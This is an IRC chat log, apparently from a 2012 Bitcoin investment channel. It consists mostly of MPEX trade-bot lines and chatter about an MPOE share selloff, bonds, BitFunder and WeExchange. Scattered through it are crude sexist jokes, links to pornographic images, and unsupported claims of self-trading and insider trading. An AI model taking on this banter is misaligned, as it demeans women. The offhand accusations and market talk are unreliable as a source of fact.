[S.MPOE] 9203 @ 0.00060799 = 5.5953 BTC [-] Dec 18 13:40:44 [MPEX] [S.MPOE] 21600 @ 0.00060789 = 13.1304 BTC [-] Dec 18 13:40:45 [MPEX] [S.MPOE] 17750 @ 0.00060758 = 10.7845 BTC [-] Dec 18 13:40:46 [MPEX] [S.MPOE] 28000 @ 0.00060758 = 17.0122 BTC [-] Dec 18 13:40:47 0,o Dec 18 13:40:47 [MPEX] [S.MPOE] 13000 @ 0.00060716 = 7.8931 BTC [-] Dec 18 13:40:48 [MPEX] [S.MPOE] 20638 @ 0.00060716 = 12.5306 BTC [-] Dec 18 13:40:48 [MPEX] [S.MPOE] 11348 @ 0.00060692 = 6.8873 BTC [-] Dec 18 13:40:49 [MPEX] [S.MPOE] 32200 @ 0.00060666 = 19.5345 BTC [-] Dec 18 13:40:50 [MPEX] [S.MPOE] 30910 @ 0.00060665 = 18.7516 BTC [-] Dec 18 13:40:51 [MPEX] [S.MPOE] 9700 @ 0.00060638 = 5.8819 BTC [-] Dec 18 13:40:52 [MPEX] [S.MPOE] 26050 @ 0.00060626 = 15.7931 BTC [-] Dec 18 13:40:53 [MPEX] [S.MPOE] 18200 @ 0.00060618 = 11.0325 BTC [-] Dec 18 13:40:54 [MPEX] [S.MPOE] 18000 @ 0.00060612 = 10.9102 BTC [-] Dec 18 13:40:55 [MPEX] [S.MPOE] 19450 @ 0.00060604 = 11.7875 BTC [-] Dec 18 13:40:56 [MPEX] [S.MPOE] 29300 @ 0.00060599 = 17.7555 BTC [-] Dec 18 13:40:57 [MPEX] [S.MPOE] 3184 @ 0.00060599 = 1.9295 BTC [-] Dec 18 13:40:58 [MPEX] [S.MPOE] 10353 @ 0.00060578 = 6.2716 BTC [-] Dec 18 13:40:58 [MPEX] [S.MPOE] 1600 @ 0.00060543 = 0.9687 BTC [-] Dec 18 13:40:59 [MPEX] [S.MPOE] 13125 @ 0.00060537 = 7.9455 BTC [-] Dec 18 13:41:00 [MPEX] [S.MPOE] 30800 @ 0.00060513 = 18.638 BTC [-] Dec 18 13:41:01 omg the jig is up Dec 18 13:41:01 [MPEX] [S.MPOE] 4313 @ 0.00060482 = 2.6086 BTC [-] Dec 18 13:41:02 [MPEX] [S.MPOE] 26694 @ 0.00060471 = 16.1421 BTC [-] Dec 18 13:41:03 [MPEX] [S.MPOE] 20182 @ 0.00060468 = 12.2037 BTC [-] Dec 18 13:41:04 [MPEX] [S.MPOE] 16450 @ 0.00060437 = 9.9419 BTC [-] Dec 18 13:41:05 [MPEX] [S.MPOE] 17100 @ 0.00060405 = 10.3293 BTC [-] Dec 18 13:41:06 [MPEX] [S.MPOE] 24450 @ 0.00060386 = 14.7644 BTC [-] Dec 18 13:41:07 [MPEX] [S.MPOE] 18703 @ 0.00060354 = 11.288 BTC [-] Dec 18 13:41:08 [MPEX] [S.MPOE] 4321 @ 0.00062202 = 2.6877 BTC [+] Dec 18 13:41:09 [MPEX] [S.MPOE] 4479 @ 0.00062237 = 2.7876 BTC [+] Dec 18 13:42:02 [MPEX] [S.MPOE] 4321 @ 0.00060376 = 2.6088 BTC [-] Dec 18 13:42:03 [MPEX] [S.MPOE] 3297 @ 0.00060354 = 1.9899 BTC [-] Dec 18 13:42:05 [MPEX] [S.MPOE] 21850 @ 0.0006034 = 13.1843 BTC [-] Dec 18 13:42:06 [MPEX] [S.MPOE] 22482 @ 0.00060295 = 13.5555 BTC [-] Dec 18 13:42:07 [MPEX] [S.MPOE] 11800 @ 0.00060291 = 7.1143 BTC [-] Dec 18 13:42:08 [MPEX] [S.MPOE] 21398 @ 0.00060289 = 12.9006 BTC [-] Dec 18 13:42:09 [MPEX] [S.MPOE] 3800 @ 0.00060286 = 2.2909 BTC [-] Dec 18 13:42:10 [MPEX] [S.MPOE] 22050 @ 0.00060278 = 13.2913 BTC [-] Dec 18 13:42:12 [MPEX] [S.MPOE] 16000 @ 0.00060256 = 9.641 BTC [-] Dec 18 13:42:13 [MPEX] [S.MPOE] 23800 @ 0.0006023 = 14.3347 BTC [-] Dec 18 13:42:13 [MPEX] [S.MPOE] 23201 @ 0.00060199 = 13.9668 BTC [-] Dec 18 13:42:14 [MPEX] [S.MPOE] 15950 @ 0.00060164 = 9.5962 BTC [-] Dec 18 13:42:15 [MPEX] [S.MPOE] 24550 @ 0.00060146 = 14.7658 BTC [-] Dec 18 13:42:16 [MPEX] [S.MPOE] 19000 @ 0.00060081 = 11.4154 BTC [-] Dec 18 13:42:17 [MPEX] [S.MPOE] 12830 @ 0.00060079 = 7.7081 BTC [-] Dec 18 13:42:18 [MPEX] [S.MPOE] 9000 @ 0.00060052 = 5.4047 BTC [-] Dec 18 13:42:19 [MPEX] [S.MPOE] 36900 @ 0.00060029 = 22.1507 BTC [-] Dec 18 13:42:20 [MPEX] [S.MPOE] 13500 @ 0.00060015 = 8.102 BTC [-] Dec 18 13:42:21 [MPEX] [S.MPOE] 4250 @ 0.00059957 = 2.5482 BTC [-] Dec 18 13:42:21 [MPEX] [S.MPOE] 9700 @ 0.00059934 = 5.8136 BTC [-] Dec 18 13:42:22 [MPEX] [S.MPOE] 11800 @ 0.0005993 = 7.0717 BTC [-] Dec 18 13:42:24 [MPEX] [S.MPOE] 15259 @ 0.000599 = 9.1401 BTC [-] Dec 18 13:42:25 [MPEX] [S.MPOE] 7300 @ 0.00059899 = 4.3726 BTC [-] Dec 18 13:42:26 [MPEX] [S.MPOE] 7750 @ 0.00059807 = 4.635 BTC [-] Dec 18 13:42:27 [MPEX] [S.MPOE] 19336 @ 0.00059804 = 11.5637 BTC [-] Dec 18 13:42:28 [MPEX] [S.MPOE] 3100 @ 0.00059792 = 1.8536 BTC [-] Dec 18 13:42:29 [MPEX] [S.MPOE] 16750 @ 0.00059784 = 10.0138 BTC [-] Dec 18 13:42:30 [MPEX] [S.MPOE] 22500 @ 0.00059782 = 13.451 BTC [-] Dec 18 13:42:31 [MPEX] [S.MPOE] 22370 @ 0.00059731 = 13.3618 BTC [-] Dec 18 13:42:31 [MPEX] [S.MPOE] 26500 @ 0.0005972 = 15.8258 BTC [-] Dec 18 13:42:32 [MPEX] [S.MPOE] 5900 @ 0.00059689 = 3.5217 BTC [-] Dec 18 13:42:33 [MPEX] [S.MPOE] 18500 @ 0.00059656 = 11.0364 BTC [-] Dec 18 13:42:34 [MPEX] [S.MPOE] 3256 @ 0.00059655 = 1.9424 BTC [-] Dec 18 13:42:41 wtf Dec 18 13:42:46 someone taking profits to put into MPOE bonds Dec 18 13:43:26 [MPEX] [S.MPOE] 22444 @ 0.00059655 = 13.389 BTC [-] Dec 18 13:43:27 [MPEX] [S.MPOE] 22600 @ 0.00059631 = 13.4766 BTC [-] Dec 18 13:43:29 [MPEX] [S.MPOE] 49100 @ 0.00059618 = 29.2724 BTC [-] Dec 18 13:43:30 [MPEX] [S.MPOE] 10700 @ 0.00059589 = 6.376 BTC [-] Dec 18 13:43:31 [MPEX] [S.MPOE] 10300 @ 0.00059566 = 6.1353 BTC [-] Dec 18 13:43:32 [MPEX] [S.MPOE] 17500 @ 0.00059565 = 10.4239 BTC [-] Dec 18 13:43:33 [MPEX] [S.MPOE] 24600 @ 0.00059556 = 14.6508 BTC [-] Dec 18 13:43:34 [MPEX] [S.MPOE] 30200 @ 0.00059541 = 17.9814 BTC [-] Dec 18 13:43:35 [MPEX] [S.MPOE] 9034 @ 0.0005938 = 5.3644 BTC [-] Dec 18 13:43:36 [MPEX] [S.MPOE] 27509 @ 0.00059329 = 16.3208 BTC [-] Dec 18 13:43:37 [MPEX] [S.MPOE] 11700 @ 0.00059328 = 6.9414 BTC [-] Dec 18 13:43:38 [MPEX] [S.MPOE] 14200 @ 0.00059325 = 8.4242 BTC [-] Dec 18 13:43:39 [MPEX] [S.MPOE] 3000 @ 0.00059201 = 1.776 BTC [-] Dec 18 13:43:40 [MPEX] [S.MPOE] 20300 @ 0.00059081 = 11.9934 BTC [-] Dec 18 13:43:41 [MPEX] [S.MPOE] 19950 @ 0.00059055 = 11.7815 BTC [-] Dec 18 13:43:42 [MPEX] [S.MPOE] 36009 @ 0.00059 = 21.2453 BTC [-] Dec 18 13:43:51 maybe someone's shorting it Dec 18 13:44:01 what's this been like 3-4mn shares ? Dec 18 13:44:05 WHO LOANED THEM OUT! Dec 18 13:44:09 i would take profits, but what am i gonna buy? Dec 18 13:44:47 pigeons this is why i don't add more assets. Dec 18 13:44:54 :) Dec 18 13:45:09 !ticker s.mpoe Dec 18 13:45:11 [MPEX:S.MPOE] 1day: 0.00059 / 0.00061393 / 0.00063658 (3496257 shares, 2,146.48 BTC), 30day: 0.00049308 / 0.00053446 / 0.00063995 (102053951 shares, 54,544.36 BTC) Dec 18 13:45:17 [MPEX] [S.DICE] 3050 @ 0.003699 = 11.282 BTC [+] Dec 18 13:45:29 heh, 1 day avg still over 61 so nyah! Dec 18 13:45:32 its just mircea_popescu trading with himself to try and look bigger than bfl Dec 18 13:45:45 why, bfl is trading with itself ? Dec 18 13:46:15 they are doing something with themself Dec 18 13:46:43 whens the next bfl dramadate ? 14th jan ? Dec 18 13:48:09 "won't ship before jan 14" so they are still on schedule when they dont ship then Dec 18 13:48:18 sounds like bfl Dec 18 13:48:30 how's your btcjam investments coming along btw ? Dec 18 13:48:53 [MPEX] [S.MPOE] 100000 @ 0.00059 = 59 BTC [-] Dec 18 13:48:57 i made one to jurov which he promptly repaid and couldn't find any more Dec 18 13:49:42 in a sense btc finance is locked down. too few worthy assets. Dec 18 13:50:56 I like that CoinBr.MPBPT fund on BitFunder. it looks like it will do good. >:P Dec 18 13:51:00 >,> <,< Dec 18 13:53:59 haha, it promptly became >90% of bitfunder trade volume Dec 18 14:04:14 [MPEX] [S.MPOE] 23250 @ 0.00059 = 13.7175 BTC [-] Dec 18 14:05:13 hi mircea popescu, i'm checking your "bonds historical data" against my own spreadsheet Dec 18 14:05:32 and Oct 12 ROI effective doesn't make sense to me Dec 18 14:09:41 or is here anybody else who invested in october bonds? Dec 18 14:11:42 *rereads october statement* indeed there was a loss and my spreadsheet lies :/ Dec 18 14:16:32 [MPEX] [S.MPOE] 5000 @ 0.00058989 = 2.9495 BTC [-] Dec 18 14:16:34 [MPEX] [S.MPOE] 4450 @ 0.00058988 = 2.625 BTC [-] Dec 18 14:16:35 [MPEX] [S.MPOE] 1233 @ 0.00058982 = 0.7272 BTC [-] Dec 18 14:28:42 [MPEX] [S.MPOE] 11469 @ 0.00059 = 6.7667 BTC [+] Dec 18 14:57:00 jurov do tell ? Dec 18 14:57:06 a ok lol Dec 18 14:57:43 now put it on reddit. Dec 18 15:05:02 btc diff has dropped back to september level. Lets see, when the fear kicks in and stops the fall. Dec 18 15:11:54 [MPEX] [X.IDIFF.JUN] 100 @ 0.21 = 21 BTC [+] Dec 18 15:32:16 [MPEX] [S.MPOE] 17707 @ 0.00059 = 10.4471 BTC [+] Dec 18 15:37:36 [MPEX] [S.MPOE] 10000 @ 0.00058983 = 5.8983 BTC [-] Dec 18 15:37:38 [MPEX] [S.MPOE] 673 @ 0.00058982 = 0.3969 BTC [-] Dec 18 15:38:47 what fear has to do with hashrate? Dec 18 15:48:50 mircea, as you wish: http://www.reddit.com/r/Bitcoin/comments/151ujm/mpoe_bonds_only_btc_investment_that_is_13_months/ Dec 18 16:01:06 eee Dec 18 16:02:38 lol Dec 18 16:05:07 [MPEX] [S.DICE] 1150 @ 0.00363031 = 4.1749 BTC [-] Dec 18 16:05:08 [MPEX] [S.DICE] 1600 @ 0.00362384 = 5.7981 BTC [-] Dec 18 16:30:44 whoa when did spoe plummet? Dec 18 16:30:57 jurov: I wanna make an Android app for CoinBr Dec 18 16:32:59 thestringpuller mod6 is working on an android app for mpex too Dec 18 16:33:16 [MPEX] [S.MPOE] 10000 @ 0.00058983 = 5.8983 BTC [+] Dec 18 16:33:17 [MPEX] [S.MPOE] 9200 @ 0.00058982 = 5.4263 BTC [-] Dec 18 16:33:35 can I be a part of it? Dec 18 16:33:39 I like Android programming Dec 18 16:34:29 LOL the jig is up Dec 18 16:34:31 i imagine so, you should talk to him Dec 18 16:35:47 is this what you guys were talking about? http://www.reddit.com/r/Bitcoin/comments/151ujm/mpoe_bonds_only_btc_investment_that_is_13_months ? Dec 18 16:36:57 ;;calc 100000 * .1 Dec 18 16:36:57 10000 Dec 18 16:38:40 mircea_popescu: lemme buy some trilemma credits real quick while you're around Dec 18 16:38:54 sure Dec 18 16:40:04 how much per credit? Dec 18 16:40:09 [MPEX] [S.MPOE] 2794 @ 0.00058982 = 1.648 BTC [-] Dec 18 16:40:10 [MPEX] [S.MPOE] 7406 @ 0.00058844 = 4.358 BTC [-] Dec 18 16:40:37 a dollah gets you 1k iirc ? what's the page say ? Dec 18 16:40:42 MPOE needs another 4,000 BTC dividend month... Dec 18 16:40:57 yea Dec 18 16:41:02 so .1 BTC? Dec 18 16:41:06 what address do I send to? Dec 18 16:41:30 Lol "If you won't pay for nice things you can't have nice things because there can't be nice things." Dec 18 16:45:10 thestringpuller, let's talk about the app later, i'm going afk for few hours now Dec 18 16:46:07 [MPEX] [S.MPOE] 9500 @ 0.00058844 = 5.5902 BTC [-] Dec 18 16:50:09 ;;ticker Dec 18 16:50:10 BTCUSD ticker | Best bid: 13.23689, Best ask: 13.24600, Bid-ask spread: 0.00911, Last trade: 13.24600, 24 hour volume: 29923.83800899, 24 hour low: 13.02386, 24 hour high: 13.39900, 24 hour vwap: 13.26171 Dec 18 17:10:51 jurov Dec 18 17:10:51 The MPOE bubble is popping unfortunately Dec 18 17:10:56 he's afk Dec 18 17:11:03 already sold almost 250 shares of the MPBPT Dec 18 17:11:07 Ukto how bout that FF7 ;) Dec 18 17:11:11 geg Dec 18 17:11:21 thestringpuller: havent had a chance, just added a depth chart to weex Dec 18 17:11:23 and other stuff Dec 18 17:11:26 so... Dec 18 17:11:30 whats up with MPOE? Dec 18 17:12:19 someone sold a lot last night into the bids Dec 18 17:12:31 well like 6 hours ago or something Dec 18 17:12:35 yeah, i saw that Dec 18 17:12:37 dnt know why tho Dec 18 17:12:49 someone borrowed a bunch and closed a short? Dec 18 17:13:18 http://codinginmysleep.com/how-i-was-almost-adam/ Dec 18 17:13:19 250 shares = 250 btc ? Dec 18 17:13:22 like that blawg Dec 18 17:14:35 mircea_popescu: 25btc Dec 18 17:15:08 so 1/4 of minimum done. this is pretty good. Dec 18 17:15:21 well Dec 18 17:15:23 more like 20btc Dec 18 17:15:28 http://www.reddit.com/r/Bitcoin/comments/151ujm/mpoe_bonds_only_btc_investment_that_is_13_months/ vote jurov's reddit lol Dec 18 17:15:31 so 1/5th in under 24hrs Dec 18 17:15:59 i had a new user Dec 18 17:16:01 prolly came from that Dec 18 17:16:02 in ru Dec 18 17:16:08 he broke his weex link Dec 18 17:16:14 deposited 1btc into BF Dec 18 17:16:20 it clearly told him it was not broken Dec 18 17:16:25 i watched in teh logs as he forced it :P Dec 18 17:16:35 mircea_popescu: given the way the auction system works Dec 18 17:16:37 then he sent in a ticket Dec 18 17:16:45 wouldn't I be guarenteed to be a bond holder if I put an interest of 1% Dec 18 17:16:53 "no deposit! not instant! you lied?!?" Dec 18 17:17:02 within 3 minutes I replied that it was fixed and his deposit was available Dec 18 17:17:12 and that his broken shit is fixed Dec 18 17:17:37 how can you break weex link? Dec 18 17:18:15 ;;google weex link Dec 18 17:18:16 Cisco WebEx Web Conferencing, Online Meetings, Desktop Sharing ...: ; Knowledge Base - My Resources - WebEx: ; Webex connect Download |299844 - Cisco Support Community: Dec 18 17:18:25 lol Dec 18 17:18:30 the weexchange merchant link Dec 18 17:18:39 you dont deposit/withdraw btc to BF Dec 18 17:18:46 you have to signupo for an account at weexchange :D Dec 18 17:18:52 you are the weex link. goodbye Dec 18 17:18:57 lol ukto, nice story. Dec 18 17:19:07 pigeons :DD Dec 18 17:19:12 mircea_popescu: I am surprised as hell, no one has made a big deal out of having to sing up for weexchange Dec 18 17:19:15 [MPEX] [S.MPOE] 5494 @ 0.00058844 = 3.2329 BTC [-] Dec 18 17:19:17 [MPEX] [S.MPOE] 24854 @ 0.00058738 = 14.5987 BTC [-] Dec 18 17:19:17 ppl have asked if it was safe.. Dec 18 17:19:20 maaaan Dec 18 17:19:23 you have no idea what i'm dealing with. Dec 18 17:19:24 but none have been mad Dec 18 17:19:27 MPOE just won't recover Dec 18 17:19:30 and i want to murder the happy couple on the login page Dec 18 17:19:33 maybe tomorrow someone will buy up a bunch of shares Dec 18 17:19:47 mircea_popescu: did you release some earlier? :P Dec 18 17:19:49 thestringpuller people have had a lot of grief waiting with mpex lol Dec 18 17:20:02 16:18.30 ( Ukto ) you dont deposit/withdraw btc to BF Dec 18 17:20:04 wait what Dec 18 17:20:10 in order to fund BF account Dec 18 17:20:13 i must send to weex? Dec 18 17:20:15 pigeons: I have a slightly diff pic. same couple, diff pose. :P Dec 18 17:20:21 kakobreklaa: damn straight Dec 18 17:20:25 lulz Dec 18 17:20:31 Ukto http://polimedia.us/dtng/c/src/135583607960.jpg use her. Dec 18 17:20:35 weex has had almost 100+ new signups in a week Dec 18 17:20:41 is that teh girl in the park or w/e? Dec 18 17:20:44 bending over? :P Dec 18 17:20:49 nice Dec 18 17:21:00 oh, nope Dec 18 17:21:01 it's one of the girls bending over. as girls are wont to do. Dec 18 17:21:10 being silly to your users is nothing to brag about Dec 18 17:21:14 what is that blurred out thing next to her? a kid? Dec 18 17:21:25 oh Dec 18 17:21:27 advertisements Dec 18 17:21:31 i see it on some bottles now Dec 18 17:21:33 omg does cicicicicu know you have nekkid pictures? Dec 18 17:22:19 mircea_popescu omfg why the fuck are the drinks censored Dec 18 17:22:33 "you can watch pussy but you cant watch coke" Dec 18 17:22:39 yeah Dec 18 17:22:43 thats what confused me Dec 18 17:23:39 oh man. I just realised both popular assets on BF rely on mpex :P Dec 18 17:23:43 .. GO MPEX GO! :P Dec 18 17:25:54 i like weex Dec 18 17:26:02 especially those instant payouts Dec 18 17:26:20 drinks are bad mkay Dec 18 17:26:27 ooh how about weex->mpex vendor link Dec 18 17:26:42 define mpex vender? Dec 18 17:27:01 same as hp or bf Dec 18 17:27:26 I will be opening the merchatn api in jan/feb Dec 18 17:27:26 https://vimeo.com/54180438 Dec 18 17:27:36 weex and hashpower get featured in that video Dec 18 17:27:38 pigeons: yeah, but what other sites? Dec 18 17:27:49 hurry and watch it before i mark it private again Dec 18 17:27:57 just say, "i will be opening the merchant api when bfl ships" Dec 18 17:28:02 This is a private video. Dec 18 17:28:08 Ukto: the mpex site Dec 18 17:28:10 Babab Dec 18 17:28:19 gogogogo Dec 18 17:28:21 quick Dec 18 17:28:22 pigeons: talk to the boss man over there Dec 18 17:28:43 http://trilema.com/2012/idiots-and-socialists-kill-people-armed-citizens-save-lives/ Dec 18 17:29:57 jchysk: whos video si that? Dec 18 17:30:06 yours? Dec 18 17:30:27 too much of mine Dec 18 17:30:29 and why does it look like old 35mm film? Dec 18 17:30:33 didn't edit myself out enough Dec 18 17:30:45 is shaking like a crack whore deprived of crack Dec 18 17:30:47 because it needs to look old because the music is old Dec 18 17:31:00 theres music? Dec 18 17:31:11 music is good :) Dec 18 17:31:22 i dont even see an vol control on the video Dec 18 17:31:30 go mouseover it Dec 18 17:31:30 vimeo sucks Dec 18 17:31:39 youtube pulled it because of coptright Dec 18 17:31:54 copyright?? Dec 18 17:31:59 whos rights dfid you infringe on ? Dec 18 17:32:01 rfngjkdghd? Dec 18 17:32:09 pink floyds Dec 18 17:32:15 oh Dec 18 17:32:16 AHH Dec 18 17:32:19 i can guess the song then Dec 18 17:32:20 :P Dec 18 17:32:32 based on all the $$'s Dec 18 17:32:36 :) Dec 18 17:33:31 yeah, you should def. add bitfunder :P Dec 18 17:34:20 I guess the russian is happy Dec 18 17:34:28 already spent his whole 1btc Dec 18 17:34:29 :P Dec 18 17:34:34 all but like 4k satoshi Dec 18 17:34:57 on sdice no less Dec 18 17:35:03 guess he wasnt from reddit :P Dec 18 17:37:21 ;;ticker s.dice Dec 18 17:37:21 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Dec 18 17:37:26 !ticker s.dice Dec 18 17:37:28 [MPEX:S.DICE] 1day: 0.0018 / 0.00360924 / 0.0037 (984870 shares, 3,554.64 BTC), 30day: 0.0018 / 0.00341118 / 0.0037 (6611778 shares, 22,553.98 BTC) Dec 18 17:37:38 poorly edited Dec 18 17:37:41 shot with cell Dec 18 17:39:26 edited with http://www.openshotvideo.com/ Dec 18 17:39:37 i actually did all that to test the software Dec 18 17:43:41 [MPEX] [S.MPOE] 4321 @ 0.00058971 = 2.5481 BTC [+] Dec 18 17:43:42 [MPEX] [S.MPOE] 18428 @ 0.00059 = 10.8725 BTC [+] Dec 18 17:43:44 [MPEX] [S.MPOE] 2601 @ 0.00059017 = 1.535 BTC [+] Dec 18 17:44:32 there we go Dec 18 17:44:33 lol Dec 18 17:51:08 http://polimedia.us/dtng/c/src/13469484178.jpg now this is what i call limo service. Dec 18 17:53:20 yay porn Dec 18 17:57:45 pigeons theres one for you http://paracoin.com/ Dec 18 17:59:03 ;;tslb Dec 18 17:59:07 Time since last block: 18 minutes and 15 seconds Dec 18 17:59:17 where do you find this shit mircea? Dec 18 18:01:07 i have people Dec 18 18:05:31 [MPEX] [S.MPOE] 4321 @ 0.00058998 = 2.5493 BTC [-] Dec 18 18:05:31 [MPEX] [S.MPOE] 7808 @ 0.00059017 = 4.608 BTC [+] Dec 18 18:05:33 [MPEX] [S.MPOE] 28871 @ 0.00059079 = 17.0567 BTC [+] Dec 18 18:18:27 re: limo pic, her hand is super scary looking Dec 18 18:19:18 kinda gnarly Dec 18 18:19:21 maybe she's a pianist Dec 18 18:19:41 besides: http://betsofbitco.in/ is a better site for betting Dec 18 18:19:43 i think Dec 18 18:22:02 theres a better one. Dec 18 18:50:28 mircea_popescu: thanks for the link. i actually like Spinner much better and I've been looking through some of their code - the schildbach has lost my btc at least 2x. Dec 18 18:52:05 Spinner has been pretty great for me so far... and I've been looking through the code. Its using the BCCAPI which has some KeyManagement stuff in there. Dec 18 18:53:13 I need to look into it more. Dec 18 18:53:20 cool Dec 18 18:53:33 ;;tslb Dec 18 18:53:36 Time since last block: 3 minutes and 58 seconds Dec 18 18:53:36 Cool, made 20% return on my Sdice. Dec 18 18:53:58 Took longer than I wanted but im happy to come out ahead. Dec 18 18:54:11 playing it? Dec 18 18:54:35 No, on my passthrough Dec 18 18:55:38 you have a passthrough too ?! Dec 18 18:55:42 o wait, you held shares nm Dec 18 18:56:49 did sdice just issue divs? Dec 18 18:57:26 Doffx: or do youmean from terras ? Dec 18 18:57:33 No mine all sold on bitfunder Dec 18 18:57:39 lol: https://twitter.com/icbit_trades Dec 18 18:57:43 At a good profit Dec 18 18:58:10 Divs for Sdice is like on the 5th or 4th of each month I thought Dec 18 18:58:32 smickles: https://twitter.com/BitFunder ;) Dec 18 18:58:34 ya Dec 18 18:58:41 last night, i was dreaming that I needed to wake up for the s.dice divs Dec 18 18:58:49 aww! Dec 18 18:58:51 LOL Dec 18 18:58:58 your concentrating too much Dec 18 18:59:47 ok so a guy paid for trilema credits two hours ago. i credited him. transaction still unconfirmed Dec 18 18:59:48 Ukto: have you told kakobreklaa , is it going to be pulled into assbot ? Dec 18 18:59:50 I WAS SCAMMED Dec 18 19:00:00 smickles: he wunt do it Dec 18 19:00:06 lol Dec 18 19:00:07 cause twatter will done day end the api Dec 18 19:00:10 :P Dec 18 19:00:11 whats wrong with you people Dec 18 19:00:36 smickles: i made that format just so all he would have to do is swing the old glbse code to it :P Dec 18 19:00:38 Doffx: section e and f explain it in detail http://mpex.co/?mpsic=S.DICE Dec 18 19:00:41 apparently its too much work >:P~ Dec 18 19:01:08 Its ok smickles I no longer own any. Dec 18 19:01:12 twitter is no good, it eating trades even if the msgs are unique ( mircea_popescu made the complaint) Dec 18 19:01:27 i already wrote new api for this shit that is made for just for it Dec 18 19:01:29 ah Dec 18 19:01:32 It will now be put in to my master plan investment Dec 18 19:01:37 i figured twatter just didnt like MP either :P Dec 18 19:01:43 and i told this at least 3 times in the chan Dec 18 19:01:48 this is the last time. Dec 18 19:01:50 http://mpex.co/ is a url redirect Dec 18 19:01:52 ? Dec 18 19:02:01 kakobreklaa: i know, but something is infinitely better than nothing Dec 18 19:02:01 I am finally 15 BTC in the Green after all my equipment and investments Dec 18 19:02:03 I honestly dont care about twatter Dec 18 19:02:19 Christmas came early Dec 18 19:02:26 mircea_popescu: did you check to see if you got double spent? Dec 18 19:02:36 smickles lets just do it the proper way. Dec 18 19:04:01 smickles nah. .1 btc Dec 18 19:05:03 mircea_popescu: i mean to say that it would be interesting if you were double spent Dec 18 19:05:24 a a Dec 18 19:05:35 https://bitcointalk.org/index.php?topic=131373.msg1407273#msg1407273 Dec 18 19:05:36 ahahaha Dec 18 19:05:40 -pr is now favicon Dec 18 19:06:29 lol Dec 18 19:12:11 4,200 of the g.sdice asset just traded on BF Dec 18 19:12:27 https://bitcointalk.org/index.php?topic=101838.msg1407306#msg1407306 Dec 18 19:12:41 why is shrem so defensive Dec 18 19:14:18 "Posting in this thread and coming up with opinions and ideas are stupid and just distract us from the real work we need to do. Dec 18 19:14:38 oh.. i see lol Dec 18 19:14:50 i think maybe he's working more than 8 hour days Dec 18 19:14:54 which is unhygienic. Dec 18 19:14:59 uhoh, he said my magic words though Dec 18 19:15:02 "We have posted many updates, always been transparent, never scammed anyone, and always have done what we say we will do. " Dec 18 19:15:33 any girls here willing to lend a consoling tit ? Dec 18 19:18:27 18:12.02 ( Ukto ) 4,200 of the g.sdice asset just traded on BF < assbot de manual. Dec 18 19:18:46 :) Dec 18 19:18:54 hahaha Dec 18 19:20:29 <-- assHOLE Dec 18 19:22:01 You are ukto Dec 18 19:22:10 cause you don't want to get me no FF7 Dec 18 19:22:12 WAAAAAh Dec 18 19:22:13 WAAAAAh Dec 18 19:22:17 <- crybaby Dec 18 19:22:25 lol Dec 18 19:22:34 i got like 13 things to get done today :P Dec 18 19:22:47 better get started Dec 18 19:22:56 I have to now drop off some bday invites for the kids party @ school Dec 18 19:22:58 cause wife didnt send em Dec 18 19:23:02 dumbass.. -_- Dec 18 19:23:07 replace her! Dec 18 19:24:16 make your wife find the FF7 Dec 18 19:24:19 ;) Dec 18 19:26:00 mircea_popescu: the .1 btc should be confirming now Dec 18 19:26:05 2 confirmations Dec 18 19:26:15 I'm a cheap schmuck and don't give no fees to no miners Dec 18 19:26:29 i got like 13 things to get done today :P << it is impolite to refer to women as "things" Dec 18 19:26:33 they are people too you know. Dec 18 19:28:12 mod6: you still around? Dec 18 19:28:27 mircea_popescu: shh Dec 18 19:28:31 my wife might hear you Dec 18 19:28:53 she doesn't believe women are people ? Dec 18 19:40:04 jcpham Dec 18 19:40:07 you still there?> Dec 18 19:40:13 yes Dec 18 19:40:20 can you unlock that video again? Dec 18 19:40:23 wanted to show Doffx :P Dec 18 19:40:39 I need a tutorial on wex Dec 18 19:40:42 weex too Dec 18 19:40:55 http://trilema.com/2012/let-me-show-you-why-i-like-bitcoin/ < Ukto you're there. so is pigeons and thestringpuller fellow Dec 18 19:41:01 just click 'use' on the box and point at weex Dec 18 19:41:01 :P Dec 18 19:41:05 i did a bad job editing my name out Dec 18 19:42:49 I'm so glad I bought Trilemma credits Dec 18 19:42:57 Oh God this article was worth the break Dec 18 19:43:05 lol Dec 18 19:43:45 Haha Pink Floyd I love it aleady jcpham Dec 18 19:43:54 AAPL went down 30% Dec 18 19:44:01 when the foxconn scandal happened Dec 18 19:44:20 Mr. Cook should have said: "The Jig is up" Dec 18 19:44:27 :D Dec 18 19:44:30 would have kicked ass Dec 18 19:45:44 Some guy representing a firm came on the news shortly after the drop from nearly 700+ a share to 500 a share and said, "We have faith in AAPL, we have begun selling puts for the winter season" Dec 18 19:46:31 I do wonder Mr. Popescu, where is all that BTC going to end up? Dec 18 19:46:43 Its ok apple will Litigate themselves some more profit and all will be ok Dec 18 19:46:55 Great little vid jcpham Dec 18 19:47:14 except it has my nick in it in a few places Dec 18 19:47:17 but yeah Dec 18 19:47:59 thestringpuller donated to the foundation i'm sure Dec 18 19:49:06 it's a good theory though to dump profits from MPOE and put it into MBOR bonds given the statistics Dec 18 19:49:33 Also: "Icbit.se offers a BTC/USD future which I wouldn’t however recomend." Makes me lol Dec 18 19:49:39 you tore the owner a new one if I recall Dec 18 19:49:47 in their defense they did pay up Dec 18 19:49:52 so maybe they fix ti for the future Dec 18 19:50:06 like GLBSE fixed it? Dec 18 19:50:07 :P Dec 18 19:50:58 well who kniows Dec 18 19:51:12 I guess the way I see it, is broad spectrum MPEX is the only thing I haven't lost money on. Dec 18 19:51:26 well, never too late to start. Dec 18 19:51:53 trust and loyalty are hard things to build in a world with little regulation Dec 18 19:52:22 with the insurance geniuses, and welfare kids who think they are brilliant stock brokers... Dec 18 19:53:07 true Dec 18 19:53:34 your barriers to entry are proven I'd say Dec 18 19:54:34 so far. Dec 18 19:56:48 august was a tough month eh? Dec 18 19:57:07 pirate month. Dec 18 19:57:21 "I. MPOE a suferit ceea ce s-ar putea foarte bine sa fie insider trading." <- I'm more referring to. Dec 18 19:58:33 [MPEX] [S.MPOE] 4 @ 0.00059079 = 0.0024 BTC [+] Dec 18 19:58:34 [MPEX] [S.MPOE] 2200 @ 0.00059227 = 1.303 BTC [+] Dec 18 19:59:30 you know there's an english version underneath Dec 18 20:01:41 Ah. But what of this insider trading? Dec 18 20:01:43 [MPEX] [S.MPOE] 4321 @ 0.00059964 = 2.591 BTC [+] Dec 18 